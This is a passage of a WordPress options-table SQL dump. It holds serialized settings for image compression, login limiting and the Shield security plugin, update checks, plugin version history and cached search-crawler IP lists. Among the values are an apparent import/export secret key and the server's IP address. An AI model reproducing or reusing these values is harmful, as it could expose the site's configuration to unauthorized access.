9942133;s:5:\"state\";s:6:\"ignore\";s:4:\"hash\";s:32:\"fc50097023d0d34c5a66f6cddcf77694\";s:10:\"handled_at\";i:1571988405;}}}'),(533,1,'wp-smush-install-type','existing'),(534,1,'wp-smush-version','3.3.1'),(535,1,'wp-smush-hide_smush_welcome','1'),(536,1,'wp-smush-networkwide','1'),(537,1,'wp-smush-settings','a:15:{s:11:\"networkwide\";b:1;s:4:\"auto\";b:1;s:5:\"lossy\";b:0;s:10:\"strip_exif\";b:1;s:6:\"resize\";b:0;s:9:\"detection\";b:0;s:8:\"original\";b:0;s:6:\"backup\";b:0;s:10:\"png_to_jpg\";b:0;s:7:\"nextgen\";b:0;s:2:\"s3\";b:0;s:9:\"gutenberg\";b:0;s:3:\"cdn\";b:0;s:11:\"auto_resize\";b:0;s:4:\"webp\";b:1;}'),(538,1,'wp-smush-image_sizes','a:7:{i:0;s:9:\"thumbnail\";i:1;s:6:\"medium\";i:2;s:5:\"large\";i:3;s:19:\"onepress-blog-small\";i:4;s:14:\"onepress-small\";i:5;s:15:\"onepress-medium\";i:6;s:12:\"medium_large\";}'),(539,1,'wp-smush-resize_sizes','a:2:{s:5:\"width\";i:2048;s:6:\"height\";i:2048;}'),(542,1,'skip-smush-setup','1'),(5138,1,'itsec_file_change_scan_destroyed','1552035293'),(5104,1,'site_meta_supported','1'),(19957,1,'wordfence_ls_version','1.0.3'),(21438,1,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:3:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-5.3.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-5.3.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-5.3-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-5.3-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:3:\"5.3\";s:7:\"version\";s:3:\"5.3\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.3\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-5.3.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-5.3.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-5.3-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-5.3-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:3:\"5.3\";s:7:\"version\";s:3:\"5.3\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.3\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.2.4.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.2.4.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.2.4-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.2.4-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.2.4\";s:7:\"version\";s:5:\"5.2.4\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.3\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1573736931;s:15:\"version_checked\";s:5:\"5.1.3\";s:12:\"translations\";a:0:{}}'),(32530,1,'limit_login_retries','a:1:{s:32:\"e5a718d766a69968dde0a3213a473de1\";i:2;}'),(32531,1,'limit_login_retries_valid','a:1:{s:32:\"e5a718d766a69968dde0a3213a473de1\";i:1569657553;}'),(32153,1,'limit_login_logged',NULL),(32154,1,'limit_login_gdpr','1'),(32155,1,'limit_login_allowed_retries','3'),(32156,1,'limit_login_lockout_duration','599940'),(32157,1,'limit_login_valid_duration','280800'),(32158,1,'limit_login_allowed_lockouts','4'),(32159,1,'limit_login_long_duration','86400'),(32160,1,'limit_login_notify_email_after','2'),(32161,1,'limit_login_admin_notify_email',''),(32162,1,'limit_login_whitelist','a:0:{}'),(32163,1,'limit_login_whitelist_usernames','a:0:{}'),(32164,1,'limit_login_blacklist','a:0:{}'),(32165,1,'limit_login_blacklist_usernames','a:1:{i:0;s:5:\"admin\";}'),(32166,1,'limit_login_trusted_ip_origins','a:1:{i:0;s:11:\"REMOTE_ADDR\";}'),(32167,1,'limit_login_lockout_notify','log'),(34189,1,'_site_transient_timeout_icwp_wpsf_serviceips_yandexbot','1575120613'),(34190,1,'_site_transient_icwp_wpsf_serviceips_yandexbot','a:11:{i:0;s:13:\"141.8.142.158\";i:1;s:12:\"141.8.188.65\";i:2;s:14:\"178.154.171.50\";i:3;s:13:\"141.8.142.126\";i:4;s:12:\"141.8.142.11\";i:5;s:12:\"141.8.189.12\";i:6;s:14:\"178.154.200.26\";i:7;s:11:\"37.9.113.13\";i:8;s:12:\"141.8.142.64\";i:9;s:14:\"178.154.171.27\";i:10;s:11:\"5.45.207.40\";}'),(34558,1,'_site_transient_timeout_updraft_initial_resume_interval','1574423122'),(34559,1,'_site_transient_updraft_initial_resume_interval','1991'),(34571,1,'_site_transient_timeout_aioseop_update_check_time','1573769530'),(34572,1,'_site_transient_aioseop_update_check_time','1573747930'),(32194,1,'jetpack_protect_global_whitelist','a:0:{}'),(32195,1,'jetpack-network-settings','a:2:{s:12:\"auto-connect\";i:0;s:28:\"sub-site-connection-override\";i:1;}'),(32237,1,'icwp_wpsf_install_date','1569079578'),(32238,1,'icwp_wpsf_plugin_options','a:21:{s:22:\"visitor_address_source\";s:14:\"AUTO_DETECT_IP\";s:21:\"last_ip_detect_source\";s:11:\"REMOTE_ADDR\";s:12:\"activated_at\";i:1571987220;s:17:\"installation_time\";i:1569079578;s:15:\"enable_tracking\";s:1:\"N\";s:25:\"google_recaptcha_site_key\";s:0:\"\";s:27:\"google_recaptcha_secret_key\";s:0:\"\";s:22:\"importexport_whitelist\";a:0:{}s:22:\"importexport_masterurl\";s:0:\"\";s:22:\"unique_installation_id\";s:40:\"330598a3017e6b584cf1804bd88a4c46ae9d6583\";s:19:\"importexport_enable\";s:1:\"Y\";s:22:\"google_recaptcha_style\";s:5:\"light\";s:20:\"display_plugin_badge\";s:1:\"N\";s:26:\"tracking_permission_set_at\";i:0;s:29:\"global_enable_plugin_features\";s:1:\"Y\";s:22:\"importexport_secretkey\";s:40:\"17b3fd9eaf146129c006781b889d385f2041f10c\";s:33:\"importexport_secretkey_expires_at\";i:1573753682;s:27:\"enable_upgrade_admin_notice\";s:1:\"Y\";s:24:\"block_send_email_address\";s:0:\"\";s:27:\"enable_xmlrpc_compatibility\";s:1:\"N\";s:22:\"this_server_ip_details\";a:3:{s:2:\"ip\";s:12:\"103.6.198.69\";s:4:\"hash\";s:32:\"5fbaa8a4586d0ace0816062d135ea2d5\";s:8:\"check_ts\";i:1573694716;}}'),(32239,1,'icwp_wpsf_admin_access_restriction_options','a:7:{s:16:\"admin_access_key\";s:0:\"\";s:29:\"admin_access_restrict_plugins\";a:0:{}s:28:\"admin_access_restrict_themes\";a:0:{}s:27:\"admin_access_restrict_posts\";a:0:{}s:15:\"sec_admin_users\";s:0:\"\";s:17:\"whitelabel_enable\";s:1:\"N\";s:31:\"enable_admin_access_restriction\";s:1:\"Y\";}'),(32240,1,'icwp_wpsf_ips_options','a:15:{s:30:\"insights_last_transgression_at\";i:0;s:25:\"insights_last_ip_block_at\";i:0;s:17:\"user_auto_recover\";s:8:\"disabled\";s:16:\"text_loginfailed\";s:7:\"default\";s:9:\"track_404\";s:3:\"log\";s:16:\"track_linkcheese\";s:8:\"disabled\";s:12:\"track_xmlrpc\";s:3:\"log\";s:18:\"track_logininvalid\";s:3:\"log\";s:20:\"track_fakewebcrawler\";s:3:\"log\";s:15:\"track_useragent\";s:3:\"log\";s:19:\"text_remainingtrans\";s:7:\"default\";s:10:\"enable_ips\";s:1:\"Y\";s:19:\"transgression_limit\";i:10;s:11:\"auto_expire\";s:3:\"day\";s:17:\"track_loginfailed\";s:20:\"transgression-single\";}'),(32241,1,'icwp_wpsf_hack_protect_options','a:26:{s:14:\"scan_frequency\";i:1;s:23:\"ptg_update_store_format\";b:1;s:16:\"rt_file_wpconfig\";s:1:\"N\";s:18:\"enable_wpvuln_scan\";s:13:\"enabled_email\";s:22:\"wpvuln_scan_autoupdate\";s:1:\"N\";s:19:\"wpvuln_scan_display\";s:13:\"enabled_admin\";s:21:\"notification_interval\";i:7;s:16:\"email_files_list\";s:1:\"N\";s:15:\"mal_scan_enable\";s:8:\"disabled\";s:19:\"mal_autorepair_core\";s:1:\"N\";s:22:\"mal_autorepair_plugins\";s:1:\"N\";s:23:\"mal_autorepair_surgical\";s:1:\"N\";s:10:\"ptg_enable\";s:8:\"disabled\";s:9:\"ptg_depth\";i:1;s:14:\"ptg_extensions\";a:5:{i:0;s:3:\"php\";i:1;s:4:\"php5\";i:2;s:2:\"js\";i:3;s:3:\"svg\";i:4;s:8:\"htaccess\";}s:19:\"ptg_reinstall_links\";s:1:\"Y\";s:19:\"enable_hack_protect\";s:1:\"Y\";s:31:\"enable_core_file_integrity_scan\";s:1:\"Y\";s:37:\"enable_unrecognised_file_cleaner_scan\";s:19:\"enabled_report_only\";s:16:\"enabled_scan_apc\";s:13:\"enabled_email\";s:24:\"attempt_auto_file_repair\";s:1:\"N\";s:12:\"is_scan_cron\";b:0;s:14:\"scans_to_build\";a:0:{}s:14:\"ufc_exclusions\";a:8:{i:0;s:9:\"error_log\";i:1;s:9:\".htaccess\";i:2;s:9:\".htpasswd\";i:3;s:9:\".user.ini\";i:4;s:7:\"php.ini\";i:5;s:10:\"web.config\";i:6;s:12:\"php_mail.log\";i:7;s:8:\"mail.log\";}s:16:\"ufc_scan_uploads\";s:1:\"N\";s:17:\"mal_fp_confidence\";s:2:\"75\";}'),(32242,1,'icwp_wpsf_loginprotect_options','a:16:{s:26:\"insights_last_2fa_login_at\";i:0;s:28:\"insights_last_login_block_at\";i:0;s:8:\"mfa_skip\";i:0;s:17:\"allow_backupcodes\";s:1:\"N\";s:17:\"enable_antibot_js\";s:1:\"N\";s:13:\"text_imahuman\";s:7:\"default\";s:19:\"text_pleasecheckbox\";s:7:\"default\";s:20:\"enable_login_protect\";s:1:\"Y\";s:19:\"rename_wplogin_path\";s:0:\"\";s:23:\"enable_login_gasp_check\";s:1:\"N\";s:20:\"login_limit_interval\";i:10;s:29:\"enable_google_recaptcha_login\";s:8:\"disabled\";s:27:\"enable_google_authenticator\";s:1:\"N\";s:26:\"email_can_send_verified_at\";i:-1;s:14:\"enable_yubikey\";s:1:\"N\";s:24:\"bot_protection_locations\";a:1:{i:0;s:5:\"login\";}}'),(32243,1,'icwp_wpsf_firewall_options','a:14:{s:31:\"insights_last_firewall_block_at\";i:0;s:16:\"text_firewalldie\";s:7:\"default\";s:15:\"enable_firewall\";s:1:\"Y\";s:21:\"include_cookie_checks\";s:1:\"N\";s:21:\"page_params_whitelist\";s:0:\"\";s:16:\"whitelist_admins\";s:1:\"N\";s:19:\"block_dir_traversal\";s:1:\"Y\";s:17:\"block_sql_queries\";s:1:\"Y\";s:21:\"block_wordpress_terms\";s:1:\"N\";s:22:\"block_field_truncation\";s:1:\"Y\";s:14:\"block_php_code\";s:1:\"N\";s:20:\"block_leading_schema\";s:1:\"N\";s:16:\"block_aggressive\";s:1:\"N\";s:22:\"block_exe_file_uploads\";s:1:\"N\";}'),(32244,1,'icwp_wpsf_user_management_options','a:17:{s:31:\"insights_last_password_block_at\";i:0;s:36:\"enable_user_login_email_notification\";s:1:\"N\";s:15:\"pass_min_length\";i:12;s:17:\"pass_min_strength\";s:1:\"4\";s:19:\"pass_force_existing\";s:1:\"N\";s:11:\"pass_expire\";i:60;s:14:\"manual_suspend\";s:1:\"N\";s:13:\"auto_password\";s:1:\"Y\";s:14:\"auto_idle_days\";i:0;s:15:\"auto_idle_roles\";a:3:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";i:2;s:6:\"author\";}s:22:\"enable_user_management\";s:1:\"Y\";s:24:\"enable_password_policies\";s:1:\"N\";s:24:\"session_timeout_interval\";i:2;s:29:\"session_idle_timeout_interval\";i:48;s:21:\"session_lock_location\";s:1:\"N\";s:33:\"session_username_concurrent_limit\";i:0;s:37:\"enable_admin_login_email_notification\";s:0:\"\";}'),(32245,1,'icwp_wpsf_lockdown_options','a:10:{s:21:\"insights_xml_block_at\";i:0;s:25:\"insights_restapi_block_at\";i:0;s:15:\"enable_lockdown\";s:1:\"Y\";s:20:\"disable_file_editing\";s:1:\"N\";s:22:\"mask_wordpress_version\";s:0:\"\";s:15:\"force_ssl_admin\";s:1:\"N\";s:28:\"hide_wordpress_generator_tag\";s:1:\"N\";s:14:\"disable_xmlrpc\";s:1:\"N\";s:25:\"disable_anonymous_restapi\";s:1:\"N\";s:22:\"block_author_discovery\";s:1:\"Y\";}'),(32246,1,'icwp_wpsf_traffic_options','a:4:{s:12:\"auto_disable\";s:1:\"N\";s:10:\"auto_clean\";i:3;s:11:\"max_entries\";i:1000;s:14:\"enable_traffic\";s:1:\"N\";}'),(32247,1,'icwp_wpsf_license_options','a:3:{s:12:\"license_data\";a:0:{}s:20:\"license_activated_at\";i:0;s:11:\"license_key\";s:0:\"\";}'),(32248,1,'icwp_wpsf_email_options','a:1:{s:25:\"send_email_throttle_limit\";i:10;}'),(32249,1,'fernleafsystems\\wordpress\\plugin\\shield\\controller\\controller','O:8:\"stdClass\":4:{s:4:\"hash\";s:32:\"d94c81d5626afb08711c1d7dd025ef8f\";s:8:\"mod_time\";i:1572181753;s:11:\"plugin_spec\";a:9:{s:10:\"properties\";a:16:{s:7:\"version\";s:5:\"8.2.3\";s:17:\"release_timestamp\";i:1571990000;s:5:\"build\";s:11:\"201910.2501\";s:11:\"slug_parent\";s:4:\"icwp\";s:11:\"slug_plugin\";s:4:\"wpsf\";s:10:\"human_name\";s:6:\"Shield\";s:10:\"menu_title\";s:6:\"Shield\";s:11:\"text_domain\";s:18:\"wp-simple-firewall\";s:16:\"base_permissions\";s:14:\"manage_options\";s:23:\"wpms_network_admin_only\";b:1;s:15:\"logging_enabled\";b:1;s:21:\"show_dashboard_widget\";b:1;s:10:\"autoupdate\";s:10:\"confidence\";s:15:\"autoupdate_days\";i:2;s:16:\"options_encoding\";s:4:\"json\";s:14:\"enable_premium\";b:1;}s:12:\"requirements\";a:2:{s:3:\"php\";s:5:\"5.4.0\";s:9:\"wordpress\";s:5:\"3.5.2\";}s:5:\"paths\";a:7:{s:6:\"source\";s:3:\"src\";s:8:\"autoload\";s:23:\"lib/vendor/autoload.php\";s:6:\"assets\";s:9:\"resources\";s:9:\"languages\";s:9:\"languages\";s:9:\"templates\";s:9:\"templates\";s:5:\"flags\";s:5:\"flags\";s:5:\"cache\";s:6:\"shield\";}s:8:\"includes\";a:3:{s:5:\"admin\";a:2:{s:3:\"css\";a:1:{i:0;s:13:\"global-plugin\";}s:2:\"js\";a:2:{i:0;s:6:\"jquery\";i:1;s:13:\"global-plugin\";}}s:12:\"plugin_admin\";a:2:{s:3:\"css\";a:4:{i:0;s:10:\"bootstrap4\";i:1;s:20:\"bootstrap-select.min\";i:2;s:6:\"plugin\";i:3;s:12:\"featherlight\";}s:2:\"js\";a:8:{i:0;s:21:\"bootstrap4.bundle.min\";i:1;s:20:\"bootstrap-select.min\";i:2;s:6:\"jquery\";i:3;s:6:\"plugin\";i:4;s:10:\"base64.min\";i:5;s:13:\"lz-string.min\";i:6;s:12:\"featherlight\";i:7;s:19:\"jquery.fileDownload\";}}s:8:\"frontend\";a:1:{s:3:\"css\";N;}}s:4:\"menu\";a:7:{s:4:\"show\";b:1;s:5:\"title\";s:15:\"Shield Security\";s:9:\"top_level\";b:1;s:14:\"do_submenu_fix\";b:1;s:8:\"callback\";s:16:\"onDisplayTopMenu\";s:10:\"icon_image\";s:20:\"pluginlogo_16x16.png\";s:11:\"has_submenu\";b:1;}s:6:\"labels\";a:10:{s:4:\"Name\";s:6:\"Shield\";s:11:\"Description\";s:108:\"Ultimate WP Security Protection - Scans, 2FA, Firewall, SPAM, Audit Trail, Security Admin, and so much more.\";s:5:\"Title\";s:15:\"Shield Security\";s:6:\"Author\";s:17:\"One Dollar Plugin\";s:10:\"AuthorName\";s:17:\"One Dollar Plugin\";s:9:\"PluginURI\";s:18:\"https://icwp.io/2f\";s:9:\"AuthorURI\";s:18:\"https://icwp.io/bv\";s:14:\"icon_url_16x16\";s:20:\"pluginlogo_16x16.png\";s:14:\"icon_url_32x32\";s:20:\"pluginlogo_32x32.png\";s:16:\"icon_url_128x128\";s:22:\"pluginlogo_128x128.png\";}s:4:\"meta\";a:3:{s:13:\"url_repo_home\";s:18:\"https://icwp.io/eh\";s:20:\"headway_changelog_id\";s:6:\"xaoEZJ\";s:19:\"privacy_policy_href\";s:35:\"https://icwp.io/shieldprivacypolicy\";}s:11:\"plugin_meta\";a:1:{i:0;a:2:{s:4:\"name\";s:26:\"5&#10025; Rate This Plugin\";s:4:\"href\";s:22:\"https://icwp.io/wpsf29\";}}s:12:\"action_links\";a:2:{s:6:\"remove\";N;s:3:\"add\";a:2:{i:0;a:5:{s:4:\"name\";s:18:\"Security Dashboard\";s:5:\"title\";s:24:\"Go To Security Dashboard\";s:4:\"href\";s:26:\"getPluginUrl_AdminMainPage\";s:6:\"target\";s:4:\"_top\";s:4:\"show\";s:6:\"always\";}i:1;a:6:{s:4:\"name\";s:20:\"&uarr; Go Pro &uarr;\";s:5:\"title\";s:29:\"For just $1/month. Seriously.\";s:4:\"href\";s:18:\"https://icwp.io/d8\";s:6:\"target\";s:6:\"_blank\";s:9:\"highlight\";b:1;s:4:\"show\";s:4:\"free\";}}}}s:21:\"update_first_detected\";a:1:{s:5:\"8.2.3\";i:1571992780;}}'),(32250,1,'icwp_wpsf_commentsfilter_options','a:7:{s:22:\"enable_comments_filter\";s:1:\"Y\";s:25:\"trusted_commenter_minimum\";i:1;s:32:\"enable_google_recaptcha_comments\";s:1:\"N\";s:31:\"enable_comments_gasp_protection\";s:1:\"N\";s:33:\"enable_comments_human_spam_filter\";s:1:\"N\";s:18:\"trusted_user_roles\";a:5:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";i:2;s:6:\"author\";i:3;s:11:\"contributor\";i:4;s:10:\"subscriber\";}s:31:\"google_recaptcha_style_comments\";s:7:\"default\";}'),(32251,1,'icwp_wpsf_autoupdates_options','a:10:{s:18:\"enable_autoupdates\";s:1:\"Y\";s:28:\"enable_autoupdate_ignore_vcs\";s:1:\"N\";s:29:\"enable_autoupdate_disable_all\";s:1:\"N\";s:33:\"enable_upgrade_notification_email\";s:0:\"\";s:36:\"enable_individual_autoupdate_plugins\";s:1:\"N\";s:15:\"autoupdate_core\";s:10:\"core_minor\";s:22:\"autoupdate_plugin_self\";s:4:\"auto\";s:12:\"update_delay\";i:0;s:14:\"delay_tracking\";a:3:{s:4:\"core\";a:1:{s:2:\"wp\";a:4:{s:5:\"5.2.3\";i:1569080267;s:5:\"5.2.4\";i:1571100848;s:5:\"5.1.3\";i:1571100848;s:3:\"5.3\";i:1573607950;}}s:7:\"plugins\";a:23:{s:19:\"akismet/akismet.php\";a:2:{s:5:\"4.1.2\";i:1569079594;s:5:\"4.1.3\";i:1572569490;}s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";a:3:{s:3:\"7.8\";i:1569935014;s:3:\"7.9\";i:1572353510;s:4:\"7.10\";i:1573692716;}s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";a:3:{s:3:\"3.3\";i:1573520271;s:7:\"3.3.1.1\";i:1573607950;s:5:\"3.3.2\";i:1573692716;}s:59:\"black-studio-tinymce-widget/black-studio-tinymce-widget.php\";a:1:{s:5:\"2.6.9\";i:1569079594;}s:33:\"classic-editor/classic-editor.php\";a:1:{s:3:\"1.5\";i:1569079594;}s:37:\"disable-comments/disable-comments.php\";a:1:{s:6:\"1.10.2\";i:1569079594;}s:23:\"elementor/elementor.php\";a:3:{s:5:\"2.7.3\";i:1569372675;s:5:\"2.7.4\";i:1570410307;s:5:\"2.7.5\";i:1572310532;}s:9:\"hello.php\";a:1:{s:5:\"1.7.2\";i:1569079594;}s:25:\"maxbuttons/maxbuttons.php\";a:3:{s:6:\"7.13.1\";i:1571144003;s:6:\"7.13.2\";i:1572569490;s:6:\"7.13.3\";i:1573520271;}s:23:\"wp-smushit/wp-smush.php\";a:3:{s:5:\"3.2.4\";i:1569079594;s:5:\"3.3.0\";i:1571837885;s:5:\"3.3.1\";i:1571921800;}s:27:\"updraftplus/updraftplus.php\";a:2:{s:7:\"1.16.17\";i:1569079594;s:7:\"1.16.20\";i:1572915108;}s:39:\"wp-file-manager/file_folder_manager.php\";a:1:{s:3:\"5.4\";i:1569079594;}s:24:\"wpforms-lite/wpforms.php\";a:3:{s:7:\"1.5.5.1\";i:1569079594;s:5:\"1.5.6\";i:1571964958;s:7:\"1.5.6.2\";i:1573174338;}s:29:\"wp-mail-smtp/wp_mail_smtp.php\";a:3:{s:5:\"1.6.2\";i:1569079594;s:5:\"1.7.0\";i:1571964958;s:5:\"1.7.1\";i:1573520271;}s:24:\"wordpress-seo/wp-seo.php\";a:3:{s:4:\"12.2\";i:1569935014;s:4:\"12.3\";i:1571144003;s:4:\"12.4\";i:1572353510;}s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";a:2:{s:5:\"4.4.1\";i:1569199989;s:5:\"4.4.2\";i:1570540480;}s:19:\"jetpack/jetpack.php\";a:3:{s:5:\"7.7.2\";i:1569286272;s:3:\"7.8\";i:1569977826;s:3:\"7.9\";i:1572961611;}s:38:\"swift-performance-lite/performance.php\";a:1:{s:5:\"2.1.1\";i:1569891513;}s:32:\"wp-simple-firewall/icwp-wpsf.php\";a:3:{s:5:\"8.2.1\";i:1570454598;s:5:\"8.2.2\";i:1571060056;s:5:\"8.2.3\";i:1571992774;}s:23:\"wp-cerber/wp-cerber.php\";a:2:{s:3:\"8.5\";i:1571360810;s:5:\"8.5.3\";i:1573477185;}s:31:\"onepress-plus/onepress-plus.php\";a:2:{s:5:\"2.1.7\";i:1572527153;s:5:\"2.1.8\";i:1573218039;}s:23:\"wordfence/wordfence.php\";a:1:{s:5:\"7.4.1\";i:1573087951;}s:35:\"login-recaptcha/login-nocaptcha.php\";a:1:{s:5:\"1.6.5\";i:1573736929;}}s:6:\"themes\";a:0:{}}s:25:\"enable_autoupdate_plugins\";s:1:\"N\";}'),(32252,1,'icwp_wpsf_headers_options','a:6:{s:14:\"enable_headers\";s:1:\"Y\";s:7:\"x_frame\";s:13:\"on_sameorigin\";s:13:\"x_xss_protect\";s:1:\"Y\";s:14:\"x_content_type\";s:1:\"Y\";s:17:\"x_referrer_policy\";s:10:\"unsafe-url\";s:32:\"enable_x_content_security_policy\";s:1:\"N\";}'),(32253,1,'icwp_wpsf_events_options','a:1:{s:13:\"enable_events\";s:1:\"Y\";}'),(32254,1,'icwp_wpsf_sessions_options','a:1:{s:27:\"autoadd_sessions_started_at\";i:1569079582;}'),(32255,1,'icwp_wpsf_audit_trail_options','a:11:{s:18:\"enable_audit_trail\";s:1:\"Y\";s:22:\"audit_trail_auto_clean\";i:14;s:25:\"enable_audit_context_wpsf\";s:1:\"Y\";s:26:\"enable_audit_context_users\";s:1:\"Y\";s:28:\"enable_audit_context_plugins\";s:1:\"Y\";s:27:\"enable_audit_context_themes\";s:1:\"Y\";s:26:\"enable_audit_context_posts\";s:1:\"Y\";s:27:\"enable_audit_context_emails\";s:1:\"Y\";s:30:\"enable_audit_context_wordpress\";s:1:\"Y\";s:23:\"audit_trail_max_entries\";i:1000;s:22:\"enable_change_tracking\";s:8:\"disabled\";}'),(32274,1,'_site_transient_timeout_icwp_wpsf_serviceips_googlebot','1576114459'),(32275,1,'_site_transient_icwp_wpsf_serviceips_googlebot','a:72:{i:0;s:13:\"72.14.199.147\";i:1;s:13:\"72.14.199.143\";i:2;s:12:\"66.249.71.30\";i:3;s:11:\"66.249.71.1\";i:4;s:13:\"72.14.199.145\";i:5;s:12:\"66.249.71.31\";i:6;s:12:\"66.249.79.82\";i:7;s:12:\"66.249.79.78\";i:8;s:12:\"66.249.79.80\";i:9;s:13:\"66.249.79.114\";i:10;s:13:\"66.249.79.110\";i:11;s:13:\"66.249.71.102\";i:12;s:13:\"66.249.71.106\";i:13;s:12:\"66.249.64.50\";i:14;s:12:\"66.249.64.46\";i:15;s:12:\"66.249.64.48\";i:16;s:13:\"66.249.75.208\";i:17;s:13:\"66.249.75.206\";i:18;s:13:\"66.249.75.210\";i:19;s:13:\"66.249.91.238\";i:20;s:13:\"66.249.91.240\";i:21;s:13:\"66.249.91.242\";i:22;s:12:\"66.249.66.44\";i:23;s:12:\"66.249.66.75\";i:24;s:12:\"66.249.66.76\";i:25;s:12:\"66.249.66.77\";i:26;s:13:\"66.249.92.139\";i:27;s:13:\"66.249.92.141\";i:28;s:13:\"66.249.92.140\";i:29;s:13:\"66.249.71.104\";i:30;s:13:\"66.249.73.221\";i:31;s:13:\"66.249.73.222\";i:32;s:13:\"66.249.90.188\";i:33;s:13:\"66.249.90.190\";i:34;s:13:\"66.249.73.220\";i:35;s:12:\"66.249.70.16\";i:36;s:12:\"66.249.70.18\";i:37;s:12:\"66.249.70.14\";i:38;s:12:\"66.249.89.47\";i:39;s:12:\"66.249.89.49\";i:40;s:13:\"66.249.73.144\";i:41;s:13:\"66.249.90.189\";i:42;s:11:\"66.249.71.8\";i:43;s:11:\"66.249.71.7\";i:44;s:13:\"72.14.199.154\";i:45;s:12:\"66.249.71.29\";i:46;s:13:\"72.14.199.156\";i:47;s:13:\"72.14.199.158\";i:48;s:12:\"66.249.71.17\";i:49;s:12:\"66.249.71.98\";i:50;s:12:\"66.249.71.96\";i:51;s:13:\"66.249.64.241\";i:52;s:12:\"72.14.199.77\";i:53;s:12:\"72.14.199.79\";i:54;s:12:\"72.14.199.68\";i:55;s:12:\"72.14.199.66\";i:56;s:12:\"72.14.199.81\";i:57;s:12:\"72.14.199.64\";i:58;s:13:\"66.249.71.158\";i:59;s:13:\"66.249.71.136\";i:60;s:13:\"66.249.73.142\";i:61;s:13:\"66.249.73.198\";i:62;s:13:\"66.249.90.168\";i:63;s:13:\"66.249.90.166\";i:64;s:13:\"66.249.73.196\";i:65;s:13:\"66.249.90.164\";i:66;s:13:\"66.249.71.127\";i:67;s:13:\"66.249.79.142\";i:68;s:13:\"66.249.79.144\";i:69;s:13:\"66.249.79.140\";i:70;s:13:\"66.249.79.130\";i:71;s:13:\"66.249.79.132\";}'),(32276,1,'_site_transient_timeout_icwp_wpsf_serviceips_bingbot','1576152415'),(32277,1,'_site_transient_icwp_wpsf_serviceips_bingbot','a:341:{i:0;s:12:\"207.46.13.14\";i:1;s:13:\"207.46.13.149\";i:2;s:12:\"207.46.13.11\";i:3;s:12:\"157.55.39.21\";i:4;s:12:\"157.55.39.26\";i:5;s:12:\"40.77.167.96\";i:6;s:13:\"40.77.167.160\";i:7;s:13:\"40.77.167.172\";i:8;s:12:\"40.77.167.37\";i:9;s:13:\"157.55.39.236\";i:10;s:13:\"40.77.167.139\";i:11;s:13:\"207.46.13.188\";i:12;s:13:\"207.46.13.222\";i:13;s:13:\"157.55.39.244\";i:14;s:13:\"157.55.39.164\";i:15;s:13:\"157.55.39.162\";i:16;s:11:\"207.46.13.9\";i:17;s:12:\"157.55.39.87\";i:18;s:13:\"207.46.13.113\";i:19;s:13:\"157.55.39.232\";i:20;s:13:\"207.46.13.145\";i:21;s:11:\"40.77.167.1\";i:22;s:13:\"40.77.167.123\";i:23;s:12:\"40.77.167.89\";i:24;s:13:\"207.46.13.140\";i:25;s:12:\"157.55.39.36\";i:26;s:13:\"40.77.167.180\";i:27;s:12:\"207.46.13.45\";i:28;s:13:\"40.77.167.151\";i:29;s:12:\"207.46.13.95\";i:30;s:12:\"40.77.167.23\";i:31;s:12:\"207.46.13.38\";i:32;s:13:\"157.55.39.219\";i:33;s:12:\"207.46.13.30\";i:34;s:12:\"157.55.39.45\";i:35;s:12:\"157.55.39.18\";i:36;s:13:\"207.46.13.134\";i:37;s:13:\"207.46.13.147\";i:38;s:12:\"157.55.39.38\";i:39;s:13:\"207.46.13.194\";i:40;s:12:\"40.77.167.31\";i:41;s:12:\"157.55.39.37\";i:42;s:13:\"40.77.167.115\";i:43;s:12:\"207.46.13.60\";i:44;s:13:\"40.77.167.111\";i:45;s:12:\"40.77.167.52\";i:46;s:13:\"157.55.39.119\";i:47;s:13:\"40.77.167.196\";i:48;s:13:\"207.46.13.220\";i:49;s:12:\"157.55.39.76\";i:50;s:13:\"40.77.167.157\";i:51;s:13:\"40.77.167.158\";i:52;s:13:\"207.46.13.112\";i:53;s:13:\"157.55.39.101\";i:54;s